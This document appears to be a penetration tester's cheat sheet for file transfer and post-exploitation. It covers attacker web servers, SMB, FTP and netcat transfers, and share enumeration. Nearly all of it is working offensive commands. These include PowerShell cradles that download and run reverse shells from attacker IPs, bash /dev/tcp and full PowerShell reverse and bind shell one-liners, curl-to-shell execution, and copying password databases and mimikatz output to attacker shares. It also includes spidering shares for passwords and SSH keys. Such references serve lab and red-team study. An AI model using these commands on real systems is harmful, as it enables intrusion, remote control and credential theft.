https://resources.infosecinstitute.com/topic/tunneling-and-port-forwarding-tools-used-during-red-teaming-assessments/
Serve files from attack box
https://medium.com/@dr.spitfire/ocsp-file-transfer-recipe-for-delicious-post-exploitation-a407e00f7346
- Create a web server in your local
php -S localhost:8090
python -m http.server 8090
python -m SimpleHTTPServer 8090
python3 -m http.server 7331
ruby -run -e httpd . -p 9000
busybox httpd -f -p 10000
# Linux
wget http://[IP_ATTACKER]/file
# getting a shell with wget
wget -q -O ss.sh 10.10.15.71/shell.sh;bash ss.sh
echo -n "IEX(New-Object Net.WebClient).DownloadString('http://172.16.40.5/reverse_shell_windows.ps1')" | iconv -t UTF-16LE | base64 -w 0
then cmd /c powershell -nop -enc {ENCODED_SHELL}
# Windows
powershell IEX(New-Object Net.WebClient).DownloadString('http://172.16.40.5/reverse_shell_windows.ps1');
powershell IEX(New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');
# From memory
powershell -nop -exec bypass -c "iex(iwr -uri 192.168.10.10/pwn.ps1 -usebasicparsing)"
#which will call pwn.ps1 which contains
Invoke-WebRequest -Uri 192.168.10.10 -OutFile C:\windows\Temp\shell.exe;
Start-Process -NoNewWindow -FilePath C:\windows\Temp\shell.exe;
# From Disk
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1mK64oH’); Invoke-AllChecks"
powershell -c wget "http://10.14.8.179:8000/shell-x86.exe" -outfile "reverso.exe"
powershell -c "(new-object System.Net.WebClient).Downloadfile('http://10.8.1.234:8000/nc.exe', 'C:\Windows\System32\spool\drivers\color\nc.exe')"
Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
iwr http://10.10.14.5/winPEASany.exe -outf winpeas.exe
certutil -urlcache -f http://ip/file c:\windows\temp\file
c:\windows\system32\cmd.exe /c wget http://172.16.40.5/shell_3434.exe C:\Windows\temp\shell_3434.exe
certutil -urlcache -f http://172.16.40.5/reverse_shell_windows.ps1 C:\Windows\System32\spool\drivers\color\reverse.ps1
copy C:\Users\john\Documents\password_manager.kdbx \\10.10.0.9\kali\password_man
cmd.exe /c ping -n2 10.10.0.9
Multiple steps
echo $storageDir = $pwd >wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://[kali ip]/[file]" >>wget.ps1
echo $file = "[file]" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Extract file through conversion
encode reverse shell (Windows)
cat rev.ps1 | iconv -t UTF-16LE | base64 -w 0
then powershell -nop -enc {ENCODED_SHELL}
encode data for easy transfer
certutil -encode 20210906053417_BloodHound.zip loot.txt
Convert file to base64
[Convert]::ToBase64String([IO.File]::ReadAllBytes(' C:\Users\file_bloodhound.zip'))
Copy and paste base64 to Kali
echo -n UEsDBC0AAAAIAECYZFJoTtTS== > file_bloodhound.zip.b64
Convert base64 file to zip archive
cat file_bloodhound.zip.b64 | base64 -d > file_bloodhound.zip
Windows unzip file
powershell.exe Expand-Archive -Path pe.zip -DestinationPath C:\xampp\htdocs\gym\upload -Force
Convert sqlite db to base64
# Print the db in base64
base64 -w 0 file.db
# Then copy the data over to attack box to decode
echo "XXX" | base64 -d > db
Reduce size of executable
reduce/optimize the file size with upx, an executable packer (also known as a PE compression tool):
upx -9 nc.exe
We can convert nc.exe to a Windows script (.cmd) with exe2hex tool
exe2hex -x nc.exe -p nc.cmd
To run on the Windows machine, we instruct powershell.exe to assemble it back into binary.
#let save the file .hex to bat and run it
copy nc.hex nc.bat
./nc.bat
Use share
- Start a share in your kali system
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support kali .
- Retrieve the data while on the victim machine (Windows)
copy \\[ATTACKER_IP]\kali\somefile /path/somefile copy Firefox.lnk \\IP\kali net view \\[IP] dir \\[IP]
# mount drives on Windows
net use abcd: \\kali_ip\myshare
net use abcd: /d # disconnect
net use abcd: /delete # then delete
Authenticated access
/home/clobee/.local/bin/smbserver.py -smb2support kali . -username clobee -password clobee
net use x: \\192.168.45.154\kali /user:clobee clobee
copy Documents\Database.kdbx x:\Database.kdbx
# delete the share
net use x: /d
TCP connection between two machines for “chat”
On kali
nc -l -p1234
On victim machine
nc 10.10.10.10 1234
PHP upload
Kali: PHP upload script
mkdir /tmp/uploads
chown www-data: /tmp/uploads
$uploaddir = '/tmp/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
Windows:
powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload_shell.php', 'file.zip')
(New-Object System.Net.WebClient).UploadFile('http://192.168.119.145/upload_shell.php', '/challenge/powershell-uploads')
TFTP + FTP
FTP server on Kali
sudo pip install pyftpdlib
python -m pyftpdlib -p21 -w
On Kali:
sudo apt update && sudo apt install atftp
mkdir /tftp # DIRECTORY HOSTING FILES
sudo chown nobody: /tftp
sudo atftpd --daemon --port 69 /tftp
On Windows (old machine - < windows xp):
tftp -i [kali ip] get [file]
tftp -i [kali ip] put [file]
–
On Kali:
#!/bin/bash
sudo apt update && sudo apt install pure-ftpd
sudo groupadd ftpgroup
sudo useradd -g ftpgroup -d /dev/null -s /etc ftpuser
sudo pure-pw useradd offsec -u ftpuser -d /ftphome # use user offsec when logging into ftp
sudo pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /tmp/ftphome # DIRECTORY HOSTING FILES
sudo chown -R ftpuser:ftpgroup /tmp/ftphome/
sudo service pure-ftpd restart
On Windows:
echo open [kali ip] 21> ftp.txt
echo USER offsec>> ftp.txt # username
echo ftp>> ftp.txt # password
echo bin>> ftp.txt # binary mode
echo GET [file]>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt
# or
echo open [kali ip] 21>ftp.txt&echo USER offsec>>ftp.txt&echo ftp>>ftp.txt&echo bin>>ftp.txt&echo GET [file]>>ftp.txt&echo bye>>ftp.txt&ftp -v -n -s:ftp.txt
Troubleshooting
501 Server cannot accept argument.
FTP client is in Active mode, client side firewall does not allow command.
To fix: use passive mode
This program cannot be run in DOS mode.
Use binary mode when copying files via FTP.
Any binary you transfer via FTP requires you to set your FTP session to binary.
#Use binary mode
binary
put file.exe
#Passive mode
passive
# typing passive x2 = binary
ftp -p 10.11.1.12
#List all files
dir -a
On windows, check which service is running on a specific port
powershell.exe Get-Process -Id (Get-NetTCPConnection -LocalPort 8888).OwningProcess
Catch reverse shell on machine (without curl or nc)
https://www.grobinson.me/reverse-shells-even-without-nc-on-linux/
On kali
nc -nvlp 4444
On victim machine
bash -c "bash &>/dev/tcp/192.168.119.203/4444 <&1"
then on kali
python -c "import pty;pty.spawn('/bin/bash')"
Use stream with netcat
- In the victim machine, open a connection
nc -nvlp 443 > incoming.sh - From attack machine, send file to a machine
nc -nv [VICTIM_IP] [PORT] < LinEnum.sh
Admin on a Windows box but don’t have Chisel?
netsh interface portproxy #Like ssh port forwarding
Get the script in the machine (linpeas.sh)
From github
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
wget -qO- https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash
Local network
sudo python -m SimpleHTTPServer 80 #Host
curl 10.10.10.10/linpeas.sh | sh #Victim
wget -qO- 10.10.10.10/linpeas.sh | sh
Without curl
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.10.16.3/80 | sh #Victim
Excute from memory and send output back to the host
nc -lvnp 9002 | tee linpeas.out #Host
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
Output to file
./linpeas.sh -a > /dev/shm/linpeas.txt #Victim
less -r /dev/shm/linpeas.txt #Read with colors
Use a linpeas binary
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64
chmod +x linpeas_linux_amd64
./linpeas_linux_amd64
Use python
python -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content)' > deepce.sh
python3 -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content.decode("utf-8"))' > deepce.sh
Upload with curl
curl.exe -F 'file=@C:\\temp\\supersecret.txt' http://172.16.1.30
Run a exe (as a process)
Start-Process -NoNewWindow -FilePath C:\Windows\Tasks\rev.exe
Use SCP on Kali
- Start SSH in the attack machine
root@kali:# systemctl start ssh.socket
- In the victim machine, copy the file across
PS C:\Users\Administrator> scp .\20200609093439_loot.zip [email protected]:/root/loot.zip
Socat Encrypted Bind shells
- Victim
Once we generate the key, we will cat the certificate and its private key into a file, which we will eventually use to encrypt our bind shell.
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem
We will use the OPENSSL-LISTEN option to create the listener on port 443, cert=bind_shell.pem to specify our certificate file, verify to disable SSL verification, and fork to spawn a child process once a connection is made to the listener:
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
sudo socat OPENSSL-LISTEN:1337,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
- Attacker
in Windows we can connect Bob’s computer to Alice’s bind shell.
We will use - to transfer data between STDIO3 and the remote host, OPENSSL to establish a remote SSL connection to Alice’s listener on 10.11.0.4:443, and verify=0 to disable SSL certificate verification:
socat - OPENSSL:10.11.0.4:443,verify=0
socat - OPENSSL:192.168.145.52:1337,verify=0
SMB
Create a windows share
net share DataShare=c:\Data /remark:"Clobee share..."
nmap -p 139,445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.11.1.5
crackmapexec smb 172.16.2.2
crackmapexec smb -u '%' -p '' --shares 172.31.1.2
crackmapexec smb -u '%' -p '' -M spider_plus
cat /tmpe_spider_plus/<ip>.json | jq '. |map_values(keys)'
# Retrieve a file
netexec smb <IP> -u u -H 'myhash' --get-file "C:\windows.old\Windows\System32\SYSTEM" SYSTEM
smbmap -R folder -H 10.10.10.11
smbmap -R folder -H 10.10.10.11 -A file.txt -q
smbmap -u "%" -p "" -H 192.168.220.152
Search shares for files containing the word pass
crackmapexec smb <ip> -u '<user>' -p '<pass>' -d '<domain>' --shares --spider "C$" --pattern "pass"
Display the files within each readable share, traversing directories at the specified depth (I recommend 2 or 3 since the higher the depth the longer it will take):
smbmap -H <ip> -u '<user>' -p '<pass>' -d '<domain>' -R --depth 2
Retrieve files
smbget -R smb://10.10.10.178/Data/ -U TempUser
Retrieve all files
smbclient //$IP/ShareDir -c 'recurse;ls'
# See crackmapexec -M spider_plus
smbclient -N -L \\\\IP | grep Disk | sed 's/^\s*\(.*\)\s*Disk.*/\1/' | while read share; do echo "======${share}======"; smbclient -N "//IP/${share}" -c dir; echo; done
smbclient "\\\\172.31.1.4\\Office_share" -c 'prompt OFF;recurse ON;mget *' -U '%'
smbclient '\\10.10.11.1\home' -N -c 'prompt OFF;recurse ON;cd "path\to\directory\";lcd "~/path/to/download/to/";mget *'
prompt OFF;recurse ON; mget *
# Then recursive reads
find . -type f -exec echo -e '\n===\n' \; -exec cat {} \;
proxychains -q smbclient '\\developer\Users' -N -c 'prompt OFF;recurse ON;cd "\tom\Desktop\";lcd "/home/here/";mget *' -U 'admin%pass'
smbget -R smb://<ip>/anonymous
proxychains -q smbclient -L \\developer -U 'admin%pass'
Copy a file on a machine
smbclient -c 'put myinstaller.msi' -U t1_corine.waters -W ZA '//thmiis.za.tryhackme.com/admin$/' Korine.1994
Display all files
smbclient //192.168.110.71/xxx -c 'ls' password -U username
smbclient -L 192.168.110.71
smbclient -L \\10.10.11.1 -U ''
smbclient //192.168.110.71/backups
smbclient -L //xxx.xxx.xxx.xxx/ -U user_name -m SMB2
smbclient -N //IP/tmp --option='client min protocol=NT1'
Search for interesting files
crackmapexec smb -d acme.corp -u administrator -p "P@ssw0rd" --spider "*" --exclude-dirs "addins,ADFS,appcompat,apppatch,AppReadiness,assembly,bcastdvr,Boot,Branding,CbsTemp,Cluster,Containers,CSC,Cursors,debug,diagnostics,DiagTrack,DigitalLocker,dot3svc,Downloaded Program Files,drivers,en-US,Fonts,GameBarPresenceWriter,Globalization,Help,IdentityCRL,IME,ImmersiveControlPanel,INF,InputMethod,Installer,L2Schemas,LiveKernelReports,Logs,Media,Microsoft.NET,Migration,Minidump,ModemLogs,OCR,Offline Web Pages,Panther,Performance,PLA,PolicyDefinitions,Prefetch,PrintDialog,Program Files,Program Files (x86),Provisioning,Registration,RemotePackages,rescache,Resources,SchCache,schemas,security,ServiceProfiles,ServiceState,servicing,Setup,ShellComponents,ShellExperiences,SKB,SoftwareDistribution,Speech,Speech_OneCore,System,System32,SystemApps,SystemResources,SysWOW64,TAPI,Tasks,Temp,tracing,twain_32,Vss,WaaS,Web,Windows,WinSxS,wlansvc" --pattern passw ssh username id_rsa id_ed25519 .pub --only-files ~/Scope/all.txt
Display a file (from inside smbclient)
# In smbclient
smb: \> get file.txt /dev/tty
rpcclient (then enumdomainusers)
showmount -e 10.10.96.135
nmap -p 111 --script nfs* 10.11.1.72
mkdir /tmp/localshare; mount 10.10.96.135:/shares /tmp/localshare
sudo mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
sudo mount -v -t nfs -o vers=2 <IP>:<SHARE> <DIRECTORY>
sudo mount -t cifs -o 'user=clobee' //10.10.10.34/users /mnt/users
sudo mount -t cifs //10.10.10.34/users -o username=adm,password='pass' /mnt/users
sudo mount -t cifs -o credentials=~/Downloads/credentials,dir_mode=0755,file_mode=0755
//10.185.10.34/users /mnt/users
sudo mount -o nolock 10.11.1.72:/home ~/home/
mkdir /home/clobee/Downloads/boxes/10.10.10.100/Users;
mount 10.10.10.100:/Users /home/clobee/Downloads/boxes/10.10.10.100/Users
calculate the permissions
smbcacls --no-pass //10.10.10.11/Users file
for i in $(ls /mnt/users); do echo $i; smbcacls --no-pass //10.10.10.11/Users $i; echo; done
Powershell reverse shell
Reverse shell
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.164',135);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Bind shell
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
In kali
nc -nv IP PORT
RDP mounting shared folder
Using xfreerdp:
# On Kali:
xfreerdp /cert-ignore /compression /auto-reconnect /u:
offsec /p:lab /v:192.168.212.250 /w:1600 /h:800 /drive:test,/home/kali/Documents/pen-
200
# On windows:
copy mimikatz.log \\tsclient\test\mimikatz.log
Using rdesktop:
# On Kali:
rdesktop -z -P -x m -u offsec -p lab 192.168.212.250 -r disk:test=/home/kali/Documents/pen-200
# On Windows:
copy mimikatz.log \\tsclient\test\mimikatz.log
Responder
sudo python3 /opt/Responder/Responder.py -I tun0 -wv
Troubleshoot
NT_STATUS_CONNECTION_DISCONNECTED “smbclient -N //10.10.10.3/tmp –option=’client min protocol=NT1’”
NT_STATUS_CONNECTION_RESET use “-m SMB2”
NT_STATUS_IO_TIMEOUT dns issue
Under global client min protocol = CORE AND client max protocol = SMB3 in /etc/samba/smb.conf
— OR
Add host to /etc/hosts / DNS server.
Debug process: Use a network traffic analyser to pin point issue
tcpdump -i >network interface<)